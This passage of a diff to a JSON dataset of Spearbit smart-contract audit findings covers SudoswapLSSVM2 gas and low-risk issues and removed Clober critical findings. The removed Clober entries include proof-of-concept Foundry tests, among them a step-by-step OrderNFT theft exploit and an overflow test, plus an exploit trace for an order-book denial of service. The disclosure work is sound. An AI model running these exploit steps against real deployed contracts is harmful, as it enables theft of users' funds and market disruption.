"SudoswapLSSVM2", - "Severity: Informational" + "Severity: Low Risk" ] }, { - "title": "Stale constant and comments reduce readability", + "title": "getAllPairsForSettings() may run out of gas", "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/SudoswapLSSVM2-Spearbit-Security-Review.pdf", - "body": "After some updates, the logic was added ~2 years ago when enum was changed to int16. Based on the comments and given that was upgradeable, it was expected that one could add new unconfigured specs with negative IDs between NONE (by decrementing it) and NOT_CONFIGURED. In this non-upgradeable fork, the current constants treat only the spec ID of 0 as NOT_CONFIGURED. // Anything > NONE and <= NOT_CONFIGURED is considered not configured int16 private constant NONE = -1; int16 private constant NOT_CONFIGURED = 0;", + "body": "The function getAllPairsForSettings() has a loop over pairsForSettings. As the creation of pairs is permissionless, that array could get arbitrarily large. Once the array is large enough, the function will run out of gas. Note: the function is only called from the outside. function getAllPairsForSettings(address settings) external view returns (address[] memory) { uint256 numPairs = pairsForSettings[settings].length(); ... for (uint256 i; i < numPairs;) { ... unchecked { ++i; } } ... }", "labels": [ "Spearbit", "SudoswapLSSVM2", - "Severity: Informational" + "Severity: Low Risk" ] }, { - "title": "Different MAX_FEE value and comments in different places is misleading", + "title": "Partially implemented SellOrderWithPartialFill functionality may cause unexpected behavior", "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/SudoswapLSSVM2-Spearbit-Security-Review.pdf", - "body": "The same MAX_FEE constant is declared in different files with different values, while comments indi- cate that these values should be the same. // 50%, must <= 1 - MAX_PROTOCOL_FEE (set in LSSVMPairFactory) uint256 internal constant MAX_FEE = 0.5e18; uint256 internal constant MAX_PROTOCOL_FEE = 0.1e18; // 10%, must <= 1 - MAX_FEE`", + "body": "pair.spotPrice() == order.expectedSpotPrice in a swap. This may be confusing to users who expect partial fills in both directions but notice unexpected behavior if deployed as-is. While the BuyOrderWithPartialFill functionality is fully implemented, the corresponding SellOrderWithPartialFill feature is partially implemented with getNFTQuoteForSellOrderWithPartialFill, an incomplete _findMaxFillableAmtForSell (placeholder comment: \"// TODO: implement\") and other supporting logic required in swap().", "labels": [ "Spearbit", "SudoswapLSSVM2", - "Severity: Informational" + "Severity: Low Risk" ] }, { - "title": "Events without indexed event parameters make it harder/inefficient for off-chain tools", + "title": "Lack of deadline checks for certain swap functions allows greater exposure to volatile market prices", "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/SudoswapLSSVM2-Spearbit-Security-Review.pdf", - "body": "Indexed event fields make them quickly accessible to off-chain tools that parse events. However, note that each indexed field costs extra gas during emission; so it's not necessarily best to index the maximum allowed per event (three fields).", + "body": "Many swap functions in LSSVMRouter use the checkDeadline modifier to prevent swaps from execut- ing beyond a certain user-specified deadline. This is presumably to reduce exposure to volatile market prices on top of the thresholds of maxCost for buys and minOutput for sells. However two router functions robustSwapETH- ForSpecificNFTsAndNFTsToToken and robustSwapERC20ForSpecificNFTsAndNFTsToToken in LSSVMRouter and all functions in VeryFastRouter are missing this modifier and the user parameter required for it. Users attempting to swap using these two swap functions do not have a way to specify a deadline for their execution unlike the other swap functions in this router. If the front-end does not highlight or warn about this, then the user swaps may get executed after a long time depending on the tip included in the transaction and the network congestion. This causes greater exposure for the swaps to volatile market prices.", "labels": [ "Spearbit", "SudoswapLSSVM2", - "Severity: Informational PropertyCheckerFactory.sol#L11, LSSVMPair.sol#L83," + "Severity: Low Risk" ] }, { - "title": "Some functions included in LSSVMPair are not found in ILSSVMPair.sol and ILSSVMPairFactory- Like.sol", + "title": "Missing function to deposit ERC1155 NFTs after pair creation", "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/SudoswapLSSVM2-Spearbit-Security-Review.pdf", - "body": "LSSVMPair contract defines the following functions which are missing from interface ILSSVMPair: 53 ROYALTY_ENGINE() spotPrice() delta() assetRecipient() pairVariant() factory() swapNFTsForToken() (2 versions) swapTokenForSpecificNFTs() getSellNFTQuoteWithRoyalties() call() withdrawERC1155()", + "body": "Functions depositNFTs() and depositERC20() are apparently used to deposit ERC721 NFTs and ERC20s into appropriate pairs after their creation. According to the project team, this is used \"for various UIs to consolidate approvals + emit a canonical event for deposits.\" However, an equivalent function for depositing ERC1155 NFTs is missing. This prevents ERC1155 NFTs from being deposited into pairs after creation for scenarios anticipated similar to ERC721 NFTs and ERC20 tokens.", "labels": [ "Spearbit", "SudoswapLSSVM2", - "Severity: Informational" + "Severity: Low Risk" ] }, { - "title": "Absent/Incomplete Natspec affects readability and maintenance", + "title": "Reading from state is more gas expensive than using msg.sender", "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/SudoswapLSSVM2-Spearbit-Security-Review.pdf", - "body": "Comments are key to understanding the codebase logic. In particular, Natspec comments provide rich documentation for functions, return variables and more. This documentation aids users, developers and auditors in understanding what the functions within the contract are meant to do. However, some functions within the codebase contain issues with respect to their comments with either no Natspec or incomplete Natspec annotations, leading to partial descriptions of the functions.", + "body": "Solmate's Owned.sol contract implements the concept of ownership (by saving during contract con- struction the deployer in the owner state variable) and owner-exclusive functions via the onlyOwner() modifier. Therefore, within functions protected by the onlyOwner() modifier, the addresses stored in msg.sender and owner will be equal. So, if a function of said characteristics has to make use of the address of the owner, it is cheaper to use msg.sender than owner, because the latter reads from the contract state (using SLOAD opcode) while the former doesn't (address is directly retrieved via the cheaper CALLER opcode). Reading from state (SLOAD opcode which costs either 100 or 2100 gas units) costs more gas than using the msg.sender environmental variable (CALLER opcode which costs 2 units of gas). Note: withdrawERC20() already uses msg.sender function withdrawETH(uint256 amount) public onlyOwner { payable(owner()).safeTransferETH(amount); ... } function withdrawERC20(ERC20 a, uint256 amount) external override onlyOwner { a.safeTransfer(msg.sender, amount); }", "labels": [ "Spearbit", "SudoswapLSSVM2", - "Severity: Informational IOwnershipTransferReceiver.sol#L6, OwnableWithTransferCallback.sol#L39-L42, RangeProp-" + "Severity: Gas Optimization" ] }, { - "title": "MAX_SETTABLE_FEE value does not follow a standard notation", + "title": "pair.factory().protocolFeeMultiplier() is read from storage on every iteration of the loop wast- ing gas", "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/SudoswapLSSVM2-Spearbit-Security-Review.pdf", - "body": "The protocol establishes several constant hard-coded MAX_FEE-like variables across different con- tracts. The percentages expressed in those variables should be declared in a standard way all over the codebase. In StandardSettings.sol#L22, the standard followed by the rest of the codebase is not respected. Not respecting the standard notation may confuse the reader.", + "body": "Not caching storage variables that are accessed multiple times within a loop causes waste of gas. If not cached, the solidity compiler will always read the value of protocolFeeMultiplier from storage during each iteration. For a storage variable, this implies extra SLOAD operations (100 additional gas for each iteration beyond the first). In contrast, for a memory variable, it implies extra MLOAD operations (3 additional gas for each iteration beyond the first).", "labels": [ "Spearbit", "SudoswapLSSVM2", - "Severity: Informational" + "Severity: Gas Optimization" ] }, { - "title": "No modifier for __Ownable_init", + "title": "The use of factory in ERC1155._takeNFTsFromSender() can be via a parameter rather than calling factory() again", "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/SudoswapLSSVM2-Spearbit-Security-Review.pdf", - "body": "Usually __Ownable_init also has a modifier like initializer or onlyInitializing, see Own- ableUpgradeable.sol#L29. The version in OwnableWithTransferCallback.sol doesn't have this. It is not really necessary as the function is internal but it is more robust if it has. function __Ownable_init(address initialOwner) internal { _owner = initialOwner; }", + "body": "factory is being sent as a parameter to _takeNFTsFromSender in LSSVMPairERC721.sol#L179, which is saving gas because it is not required to read the value again. _takeNFTsFromSender(IERC721(nft()), nftIds, _factory, isRouter, routerCaller); However, in LSSVMPairERC1155.sol#L181, the similar function _takeNFTsFromSender() gets the value by calling factory() instead of using a parameter. _takeNFTsFromSender(IERC1155(nft()), numNFTs[0], isRouter, routerCaller); This creates an unnecessary asymmetry between the two contracts which are expected to be similar and also a possible gas optimization by avoiding a call to the factory getter.", "labels": [ "Spearbit", "SudoswapLSSVM2", - "Severity: Informational" + "Severity: Gas Optimization" ] }, { - "title": "Wrong value of seconds in year slightly affects precision", + "title": "Variables only set at construction time could be made immutable", "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/SudoswapLSSVM2-Spearbit-Security-Review.pdf", - "body": "Calculation of ONE_YEAR_SECS takes into account leap years (typically 365.25 days), looking for most exact precision. However as can be seen at NASA and stackoverflow, the value is slightly different. Current case: 365.2425 days = 31_556_952 / (24 * 3600) NASA case: 365.2422 days = 31_556_926 / (24 * 3600)", + "body": "immutable variables can be assigned either at construction time or at declaration time, and only once. The contract creation code generated by the compiler will modify the contracts runtime code before it is returned by replacing all references to immutable variables by the values assigned to the them; so the compiler does not reserve a storage slot for these variables. Declaring variables only set at construction time as immutable results in saving one call per variable to SSTORE (0x55) opcode, thus saving gas during construction.", "labels": [ "Spearbit", "SudoswapLSSVM2", - "Severity: Informational" + "Severity: Gas Optimization" ] }, { - "title": "Missing idempotent checks may be added for consistency", + "title": "Hoisting check out of loop will save gas", "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/SudoswapLSSVM2-Spearbit-Security-Review.pdf", - "body": "Setter functions could check if the value being set is the same as the variable's existing value to avoid doing a state variable write in such scenarios and they could also revert to flag potentially mismatched offchain-onchain states. While this is done in many places, there are a few setters missing this check.", + "body": "The check numIdsFound == maxIdsNeeded will never be true before the outer for loop finishes iterating over maxIdsNeeded because numIdsFound is conditionally incremented only by 1 in each iteration.", "labels": [ "Spearbit", "SudoswapLSSVM2", - "Severity: Informational" + "Severity: Gas Optimization" ] }, { - "title": "Missing events affect transparency and monitoring", + "title": "Functionality of safeBatchTransferFrom() is not used", "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/SudoswapLSSVM2-Spearbit-Security-Review.pdf", - "body": "Missing events in critical functions, especially privileged ones, reduce transparency and ease of monitoring. Users may be surprised at changes affected by such functions without being able to observe related events.", + "body": "The function pairTransferERC1155From() allow that transfer of multiple id's of ERC1155 NFTs. The rest of the code only uses one id at a time. Using safeTransferFrom() instead of safeBatchTransferFrom(), might be better as it only accesses one id and uses less gas because no for loop is necessary. However future version of Sudoswap might support multiple ids. In that case its better to leave as is. function pairTransferERC1155From(..., uint256[] calldata ids, uint256[] calldata amounts,...) ... { ... nft.safeBatchTransferFrom(from, to, ids, amounts, bytes(\"\")); }", "labels": [ "Spearbit", "SudoswapLSSVM2", - "Severity: Informational LSSVMPair.sol#L640-L645, LSSVMPairFactory.sol#L485-L492, LSSVMPairFactory.sol#L501-L508," + "Severity: Gas Optimization" ] }, { - "title": "Wrong error returned affects debugging and off-chain monitoring", + "title": "Using != 0 instead of > 0 can save gas", "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/SudoswapLSSVM2-Spearbit-Security-Review.pdf", - "body": "Error.INVALID_NUMITEMS is declared for 0 case, but is returned twice in the same function: first time for numItems == 0 and second time for numItems >= nftBalance. This can make hard to know why it is failing.", + "body": "When dealing with unsigned integer types, comparisons with != 0 are 3 gas cheaper than > 0.", "labels": [ "Spearbit", "SudoswapLSSVM2", - "Severity: Informational" + "Severity: Gas Optimization" ] }, { - "title": "Functions can be renamed for clarity and consistency", + "title": "Using >>1 instead of /2 can save gas", "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/SudoswapLSSVM2-Spearbit-Security-Review.pdf", - "body": "Since both functions cloneETHPair() and cloneERC20Pair() use IERC721 nft as a parameter, renaming them to cloneERC721ETHPair() and cloneERC721ERC20Pair() respectively makes it clearer that the functions process ERC721 tokens. This also provides consistency in the naming of functions considering that we already have function cloneERC1155ETHPair() using this nomenclature.", + "body": "A division by 2 can be calculated by shifting one to the right (>>1). While the DIV opcode uses 5 gas, the SHR opcode only uses 3 gas.", "labels": [ "Spearbit", "SudoswapLSSVM2", - "Severity: Informational" + "Severity: Gas Optimization" ] }, { - "title": "Two events TokenDeposit() with different parameters", + "title": "Retrieval of ether balance of contract can be gas optimized", "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/SudoswapLSSVM2-Spearbit-Security-Review.pdf", - "body": "The event TokenDeposit() of LSSVMPairFactory has an address parameter while the event Tok- enDeposit() of LSSVMPair has an uint256 parameter. This might be confusing. contract LSSVMPairFactory { ... event TokenDeposit(address poolAddress); ... } abstract contract LSSVMPair ... { ... event TokenDeposit(uint256 amount); ... }", + "body": "The retrieval of the ether balance of a contract is typically done with address(this).balance. However, by using an assembly block and the selfbalance() instruction, one can get the balance with a discount of 15 units of gas.", "labels": [ "Spearbit", "SudoswapLSSVM2", - "Severity: Informational" + "Severity: Gas Optimization" ] }, { - "title": "Unused imports affect readability", + "title": "Function parameters should be validated at the very beginning for gas optimizations", "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/SudoswapLSSVM2-Spearbit-Security-Review.pdf", - "body": "The following imports are unused in XykCurve.sol import {IERC721} from \"@openzeppelin/contracts/token/ERC721/IERC721.sol\"; import {LSSVMPair} from \"../LSSVMPair.sol\"; import {LSSVMPairERC20} from \"../LSSVMPairERC20.sol\"; import {LSSVMPairCloner} from \"../lib/LSSVMPairCloner.sol\"; import {ILSSVMPairFactoryLike} from \"../LSSVMPairFactory.sol\"; LSSVMPairERC20.sol 58 import {IERC721} from \"@openzeppelin/contracts/token/ERC721/IERC721.sol\"; import {ICurve} from \"./bonding-curves/ICurve.sol\"; import {CurveErrorCodes} from \"./bonding-curves/CurveErrorCodes.sol\"; LSSVMPairETH.sol import {IERC721} from \"@openzeppelin/contracts/token/ERC721/IERC721.sol\"; import {ICurve} from \"./bonding-curves/ICurve.sol\";", + "body": "Function parameters should be validated at the very beginning of the function to allow typical execu- tion paths and revert on the exceptional paths, which will lead to gas savings over validating later.", "labels": [ "Spearbit", "SudoswapLSSVM2", - "Severity: Informational" + "Severity: Gas Optimization" ] }, { - "title": "Use of isPair() is not intuitive", + "title": "Loop counters are not gas optimized in some places", "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/SudoswapLSSVM2-Spearbit-Security-Review.pdf", - "body": "There are two usecases for isPair() 1) To check if the contract is a pair of any of the 4 types. Here the type is always retrieved via pairVariant(). 2) To check if a pair is ETH / ERC20 / ERC721 / ERC1155. Each of these values are represented by two different pair types. Using isPair() this way is not intuitive and some errors have been made in the code where only one value is tested. Note: also see issue \"pairTransferERC20From only supports ERC721 NFTs\". Function isPair() could be refactored to make the code easier to read and maintain. function isPair(address potentialPair, PairVariant variant) public view override returns (bool) { ... } These are the occurrences of use case 1: LSSVMPairFactory.sol: require(isPair(pairAddress, LSSVMPair(pairAddress).pairVariant()), \"Invalid pair address\"); ,! LSSVMPairFactory.sol: address\"); ,! LSSVMPairFactory.sol: require(isPair(pairAddress, LSSVMPair(pairAddress).pairVariant()), \"Invalid pair if (isPair(recipient, LSSVMPair(recipient).pairVariant())) { // router interaction, which first queries `pairVariant()` LSSVMPairERC20.sol: LSSVMPairERC20.sol: LSSVMPairERC20.sol: erc721/LSSVMPairERC721.sol: erc721/LSSVMPairERC721.sol: erc1155/LSSVMPairERC1155.sol: // router and VeryFastRouter function pairTransferERC20From(..., ILSSVMPairFactoryLike.PairVariant variant) ... { router.pairTransferERC20From(..., pairVariant()); router.pairTransferERC20From(..., pairVariant() router.pairTransferERC20From(..., pairVariant()); router.pairTransferNFTFrom(..., pairVariant()); router.pairTransferNFTFrom(..., pairVariant()); router.pairTransferERC1155From(..., pairVariant()); ... require(factory.isPair(msg.sender, variant), \"Not pair\"); ... } function pairTransferNFTFrom(..., ILSSVMPairFactoryLike.PairVariant variant ... { require(factory.isPair(msg.sender, variant), \"Not pair\"); ... ... } function pairTransferERC1155From(..., ILSSVMPairFactoryLike.PairVariant variant) ... { ... require(factory.isPair(msg.sender, variant), \"Not pair\"); ... } These are the occurrences of use case 2: 59 LSSVMPairFactory.sol: StandardSettings.sol: StandardSettings.sol: StandardSettings.sol: StandardSettings.sol: (isPair(...ERC721_ERC20) ...isPair(....ERC721_ETH) ...isPair(...ERC721_ERC20) ...isPair(...ERC721_ETH) ...isPair(...ERC721_ERC20) || isPair(...ERC1155_ERC20)) || ...isPair(...ERC1155_ETH) || ...isPair(...ERC1155_ERC20) || ...isPair(...ERC1155_ETH) || ...isPair(...ERC1155_ERC20)", + "body": "Loop counters are optimized in many parts of the code by using an unchecked {++i} (unchecked + prefix increment). However, this is not done in some places where it is safe to do so.", "labels": [ "Spearbit", "SudoswapLSSVM2", - "Severity: Informational" + "Severity: Gas Optimization MerklePropertyChecker.sol#L22," ] }, { - "title": "Royalty related code spread across different contracts affects readability", + "title": "Mixed use of custom errors and revert strings is inconsistent and uses extra gas", "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/SudoswapLSSVM2-Spearbit-Security-Review.pdf", - "body": "The contract LSSVMPairFactory contains the function authAllowedForToken(), which has a lot of interactions with external contracts related to royalties. The code is rather similar to code that is present in the RoyaltyEngine contract. Combining this code in RoyaltyEngine contract would make the code cleaner and easier to read.", + "body": "In some parts of the code, custom errors are declared and later used (CurveErrorCodes and Own- able Errors), while in other parts, classic revert strings are used in require statements. Instead of using error strings, custom errors can be used, which would reduce deployment and runtime costs. Using only custom errors would improve consistency and gas cost. This would also avoid long revert strings which consume extra gas. Each extra memory word of bytes past the original 32 incurs an MSTORE which costs 3 gas. This happens at LSSVMPair.sol#L133, LSSVMPair.sol#L666 and LSSVMPairFactory.sol#L505.", "labels": [ "Spearbit", "SudoswapLSSVM2", - "Severity: Informational" + "Severity: Gas Optimization" ] }, { - "title": "OrderBook Denial of Service leveraging blacklistable tokens like USDC", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Clober-Spearbit-Security-Review.pdf", - "body": "The issue was spotted while analysing additional impact and fix for 67 Proof of concept checked with the original audit commit: 28062f477f571b38fe4f8455170bd11094a71862 and the newest available commit from dev branch: 2ed4370b5de9cec5c455f5485358db194f093b01 Due to the architecture decision which implements orders queue as a cyclic buffer the OrderBook after reaching MAX_ORDERS (~32k) for a given price point, starts to overwrite stale orders. If an order was never claimed or it is broken, so it cannot be claimed, it is not possible to place a new order in a queue. This emerges due to a fact that it is not possible to finalize the stale order and deliver the underlying assets, what is done while placing a new and replacing a stale order. Effectively this issue can be used to block the main functionality of the OrderBook, so placing new orders for a given price point. Only a single broken order per price-point is enough to lead to this condition. The issue will not be immediately visible as it requires the cyclic buffer to make a circle and encounter the broken order. The proof of concept in SecurityAuditTests.sol attachment implements a simple scenario where a USDC-like mock token is used: 1. Mallory creates one ASK order at some price point (to sell X base tokens for Y quoteTokens). 2. Mallory transfers ownership of the OrderNFT token to an address which is blacklisted by quoteToken (e.g. USDC) 3. Orders queue implemented as a circular buffer over time overflows and starts replacing old orders. 4. When it is the time to replace the order the quoteToken is about to be transferred, but due to the blacklist the assets cannot be delivered. 5. At this point it is impossible to place new orders at this price index, unless the owner of the OrderNFT transfers it to somebody who can receive quoteToken. Proof of concept result for the newest 2ed4370b5de9cec5c455f5485358db194f093b01 commit: # $ git clone ... && git checkout 2ed4370b5de9cec5c455f5485358db194f093b01 # $ forge test -m \"test_security_BlockOrderQueueWithBlacklistableToken\" [25766] MockOrderBook::limitOrder(0x0000000000000000000000000000000000004444, 3, 0, ,! 333333333333333334, 2, 0x) [8128] OrderNFT::onBurn(false, 3, 0) [1448] MockOrderBook::getOrder((false, 3, 0)) [staticcall] (1, 0, 0x00000000000000000000000000000000DeaDBeef) emit Approval(owner: 0x00000000000000000000000000000000DeaDBeef, approved: 0x0000000000000000000000000000000000000000, tokenId: 20705239040371691362304267586831076357353326916511159665487572671397888) emit Transfer(from: 0x00000000000000000000000000000000DeaDBeef, to: 0x0000000000000000000000000000000000000000, tokenId: 20705239040371691362304267586831076357353326916511159665487572671397888) () emit ClaimOrder(claimer: 0x0000000000000000000000000000000000004444, user: 0x00000000000000000000000000000000DeaDBeef, rawAmount: 1, bountyAmount: 0, orderIndex: 0, priceIndex: 3, isBase: false) [714] MockSimpleBlockableToken::transfer(0x00000000000000000000000000000000DeaDBeef, 10000) ,! ,! ,! ,! ,! ,! \"blocked\" \"blocked\" \"blocked\" 5 In real life all *-USDC and USDC-* pairs as well as other pairs where a single token implements a block list are affected. The issue is also appealing to the attacker as at any time if the attacker controls the blacklisted wallet address, he/she can transfer the unclaimable OrderNFT to a whitelisted address to claim his/her assets and to enable processing until the next broken order is placed in the cyclic buffer. It can be used either to manipulate the market by blocking certain types of orders per given price points or simply to blackmail the DAO to resume operations.", + "title": "Array length read in each iteration of the loop wastes gas", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/SudoswapLSSVM2-Spearbit-Security-Review.pdf", + "body": "If not cached, the Solidity compiler will always read the length of the array from storage during each iteration. For storage array, this implies extra SLOAD operations (100 additional gas for each iteration beyond the first). In contrast, for a memory array, it implies extra MLOAD operations (3 additional gas for each iteration beyond the first).", "labels": [ "Spearbit", - "Clober", - "Severity: Critical Risk" + "SudoswapLSSVM2", + "Severity: Gas Optimization LSSVMPairERC1155.sol, LSSVMPairETH.sol, LSSVMPairERC721.sol," ] }, { - "title": "Overflow in SegmentedSegmentTree464", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Clober-Spearbit-Security-Review.pdf", - "body": "SegmentedSegmentTree464.update needs to perform an overflow check in case the new value is greater than the old value. This overflow check is done when adding the new difference to each node in each layer (using addClean). Furthermore, there's a final overflow check by adding up all nodes in the first layer in total(core). However, in total, the nodes in individual groups are added using DirtyUint64.sumPackedUnsafe: function total(Core storage core) internal view returns (uint64) { return DirtyUint64.sumPackedUnsafe(core.layers[0][0], 0, _C) + DirtyUint64.sumPackedUnsafe(core.layers[0][1], 0, _C); } The nodes in a group can overflow without triggering an overflow & revert. The impact is that the order book depth and claim functionalities break for all users. 6 // SPDX-License-Identifier: BUSL-1.1 pragma solidity ^0.8.0; import \"forge-std/Test.sol\"; import \"forge-std/StdJson.sol\"; import \"../../contracts/mocks/SegmentedSegmentTree464Wrapper.sol\"; contract SegmentedSegmentTree464Test is Test { using stdJson for string; uint32 private constant _MAX_ORDER = 2**15; SegmentedSegmentTree464Wrapper testWrapper; function setUp() public { testWrapper = new SegmentedSegmentTree464Wrapper(); } function testTotalOverflow() public { uint64 half64 = type(uint64).max / 2 + 1; testWrapper.update(0, half64); // map to the right node of layer 0, group 0 testWrapper.update(_MAX_ORDER / 2 - 1, half64); assertEq(testWrapper.total(), 0); } }", + "title": "Not tightly packing struct variables consumes extra storage slots and gas", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/SudoswapLSSVM2-Spearbit-Security-Review.pdf", + "body": "Gas efficiency can be achieved by tightly packing structs. Struct variables are stored in 32 bytes each and so you can group smaller types to occupy less storage.", "labels": [ "Spearbit", - "Clober", - "Severity: Critical Risk" + "SudoswapLSSVM2", + "Severity: Gas Optimization" ] }, { - "title": "OrderNFT theft due to controlling future and past tokens of same order index", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Clober-Spearbit-Security-Review.pdf", - "body": "The order queue is implemented as a ring buffer, to get an order (Orderbook.getOrder) the index in the queue is computed as orderIndex % _MAX_ORDER. The owner of an OrderNFT also uses this function. function _getOrder(OrderKey calldata orderKey) internal view returns (Order storage) { return _getQueue(orderKey.isBid, orderKey.priceIndex).orders[orderKey.orderIndex & _MAX_ORDER_M]; } CloberOrderBook(market).getOrder(decodeId(tokenId)).owner Therefore, the current owner of the NFT of orderIndex also owns all NFTs with orderIndex + k * _MAX_ORDER. An attacker can set approvals of future token IDs to themself. These approvals are not cleared on OrderNFT.onMint when a victim mints this future token ID, allowing the attacker to steal the NFT and cancel the NFT to claim their tokens. 7 // SPDX-License-Identifier: BUSL-1.1 pragma solidity ^0.8.0; import \"forge-std/Test.sol\"; import \"../../../../contracts/interfaces/CloberMarketSwapCallbackReceiver.sol\"; import \"../../../../contracts/mocks/MockQuoteToken.sol\"; import \"../../../../contracts/mocks/MockBaseToken.sol\"; import \"../../../../contracts/mocks/MockOrderBook.sol\"; import \"../../../../contracts/markets/VolatileMarket.sol\"; import \"../../../../contracts/OrderNFT.sol\"; import \"../utils/MockingFactoryTest.sol\"; import \"./Constants.sol\"; contract ExploitsTest is Test, CloberMarketSwapCallbackReceiver, MockingFactoryTest { struct Return { address tokenIn; address tokenOut; uint256 amountIn; uint256 amountOut; uint256 refundBounty; } struct Vars { uint256 inputAmount; uint256 outputAmount; uint256 beforePayerQuoteBalance; uint256 beforePayerBaseBalance; uint256 beforeTakerQuoteBalance; uint256 beforeOrderBookEthBalance; } MockQuoteToken quoteToken; MockBaseToken baseToken; MockOrderBook orderBook; OrderNFT orderToken; function setUp() public { quoteToken = new MockQuoteToken(); baseToken = new MockBaseToken(); } function cloberMarketSwapCallback( address tokenIn, address tokenOut, uint256 amountIn, uint256 amountOut, bytes calldata data ) external payable { if (data.length != 0) { Return memory expectedReturn = abi.decode(data, (Return)); assertEq(tokenIn, expectedReturn.tokenIn, \"ERROR_TOKEN_IN\"); assertEq(tokenOut, expectedReturn.tokenOut, \"ERROR_TOKEN_OUT\"); assertEq(amountIn, expectedReturn.amountIn, \"ERROR_AMOUNT_IN\"); assertEq(amountOut, expectedReturn.amountOut, \"ERROR_AMOUNT_OUT\"); assertEq(msg.value, expectedReturn.refundBounty, \"ERROR_REFUND_BOUNTY\"); } IERC20(tokenIn).transfer(msg.sender, amountIn); } 8 function _createOrderBook(int24 makerFee, uint24 takerFee) private { orderToken = new OrderNFT(); orderBook = new MockOrderBook( address(orderToken), address(quoteToken), address(baseToken), 1, 10**4, makerFee, takerFee, address(this) ); orderToken.init(\"\", \"\", address(orderBook), address(this)); uint256 _quotePrecision = 10**quoteToken.decimals(); quoteToken.mint(address(this), 1000000000 * _quotePrecision); quoteToken.approve(address(orderBook), type(uint256).max); uint256 _basePrecision = 10**baseToken.decimals(); baseToken.mint(address(this), 1000000000 * _basePrecision); baseToken.approve(address(orderBook), type(uint256).max); } function _buildLimitOrderOptions(bool isBid, bool postOnly) private pure returns (uint8) { return (isBid ? 1 : 0) + (postOnly ? 2 : 0); } uint256 private constant _MAX_ORDER = 2**15; // 32768 uint256 private constant _MAX_ORDER_M = 2**15 - 1; // % 32768 function testExploit2() public { _createOrderBook(0, 0); address attacker = address(0x1337); address attacker2 = address(0x1338); address victim = address(0xbabe); // Step 1. Attacker creates an ASK limit order and receives NFT uint16 priceIndex = 100; uint256 orderIndex = orderBook.limitOrder{value: Constants.CLAIM_BOUNTY * 1 gwei}({ user: attacker, priceIndex: priceIndex, rawAmount: 0, baseAmount: 1e18, options: _buildLimitOrderOptions(Constants.ASK, Constants.POST_ONLY), data: new bytes(0) }); // Step 2. Given the `OrderKey` which represents the created limit order, an attacker can craft ,! ambiguous tokenIds CloberOrderBook.OrderKey memory orderKey = CloberOrderBook.OrderKey({isBid: false, priceIndex: priceIndex, orderIndex: orderIndex}); uint256 currentTokenId = orderToken.encodeId(orderKey); orderKey.orderIndex += _MAX_ORDER; uint256 futureTokenId = orderToken.encodeId(orderKey); // Step 3. Attacker approves the futureTokenId to themself, and cancels the current id vm.startPrank(attacker); orderToken.approve(attacker2, futureTokenId); CloberOrderBook.OrderKey[] memory orderKeys = new CloberOrderBook.OrderKey[](1); orderKeys[0] = orderKey; orderKeys[0].orderIndex = orderIndex; // restore original orderIndex 9 orderBook.cancel(attacker, orderKeys); vm.stopPrank(); // Step 4. attacker fills queue, victim creates their order recycles orderIndex 0 uint256 victimOrderSize = 1e18; for(uint256 i = 0; i < _MAX_ORDER; i++) { orderBook.limitOrder{value: Constants.CLAIM_BOUNTY * 1 gwei}({ user: i < _MAX_ORDER - 1 ? attacker : victim, priceIndex: priceIndex, rawAmount: 0, baseAmount: victimOrderSize, options: _buildLimitOrderOptions(Constants.ASK, Constants.POST_ONLY), data: new bytes(0) }); } assertEq(orderToken.ownerOf(futureTokenId), victim); // Step 5. Attacker steals the NFT and can cancel to receive the tokens vm.startPrank(attacker2); orderToken.transferFrom(victim, attacker, futureTokenId); vm.stopPrank(); assertEq(orderToken.ownerOf(futureTokenId), attacker); uint256 baseBalanceBefore = baseToken.balanceOf(attacker); vm.startPrank(attacker); orderKeys[0].orderIndex = orderIndex + _MAX_ORDER; orderBook.cancel(attacker, orderKeys); vm.stopPrank(); assertEq(baseToken.balanceOf(attacker) - baseBalanceBefore, victimOrderSize); } }", + "title": "Variables that are redeclared in each loop iteration can be declared once outside the loop", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/SudoswapLSSVM2-Spearbit-Security-Review.pdf", + "body": "price is redefined in each iteration of the loop and right after declaration is set to a new value. for (uint256 i; i < numNFTs; i++) { uint256 price; (, spotPrice, delta, price,,) = pair.bondingCurve().getBuyInfo(spotPrice, delta, 1, fee, pair.factory().protocolFeeMultiplier()); ... }", "labels": [ "Spearbit", - "Clober", - "Severity: Critical Risk" + "SudoswapLSSVM2", + "Severity: Gas Optimization" ] }, { - "title": "OrderNFT theft due to ambiguous tokenId encoding/decoding scheme", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Clober-Spearbit-Security-Review.pdf", - "body": "The encodeId() uniquely encodes OrderKey to a uin256 number. However, decodeId() ambigu- ously can decode many tokenId's to the exact same OrderKey. This can be problematic due to the fact that contract uses tokenId's to store approvals. The ambiguity comes from converting uint8 value to bool isBid value here function decodeId(uint256 id) public pure returns (CloberOrderBook.OrderKey memory) { uint8 isBid; uint16 priceIndex; uint232 orderIndex; assembly { orderIndex := id priceIndex := shr(232, id) isBid := shr(248, id) } return CloberOrderBook.OrderKey({isBid: isBid == 1, priceIndex: priceIndex, orderIndex: orderIndex}); ,! } (note that the attack is possible only for ASK limit orders) 11 Proof of Concept // Step 1. Attacker creates an ASK limit order and receives NFT uint16 priceIndex = 100; uint256 orderIndex = orderBook.limitOrder{value: Constants.CLAIM_BOUNTY * 1 gwei}({ user: attacker, priceIndex: priceIndex, rawAmount: 